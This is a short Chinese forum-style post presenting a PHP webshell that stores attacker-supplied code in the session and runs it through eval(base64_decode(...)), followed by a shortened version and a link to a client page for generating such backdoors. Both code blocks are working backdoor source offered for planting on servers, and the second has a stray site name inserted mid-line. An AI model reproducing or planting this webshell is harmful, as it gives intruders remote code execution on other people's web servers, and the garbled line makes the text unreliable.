和海阳的CS马一样,运行后会在主机“内存”里生成一个php后门。
只是我的客户端多加了点选项使得对方可以进行多个选择来生成自己需要的后门。
其实这些后门也是由偶来抉择的,其实很简单,你只要把php后门开头的<?和结尾的?>去掉就可以了。
代码:
代码:
--------------------------------------------------------------------------------
<?PHP
session_start();
if(isset($_POST['code'])){
$_SESSION['theCode'] = trim($_POST['code']);
}
if(isset($_SESSION['theCode'])){
eval(base64_decode($_SESSION['theCode']));
}
?>
--------------------------------------------------------------------------------
lanker看了之后说代码是可以简化的。
改了后的代码:
代码:
--------------------------------------------------------------------------------
<?php
session_start();
isset($_POST['code']) && $_SESSION['theCode']=trim($_POST['code']); 54com.cn
isset($_SESSION['theCode']) && eval(base64_decode($_SESSION['theCode']));
?>
--------------------------------------------------------------------------------
呵呵,是少了点的样子,不过觉得其实也差不多的说~~if语句变这个样子了。
我实在比较懒,就不改了不改了。
客户端 http://www.77yan.com/clent.html
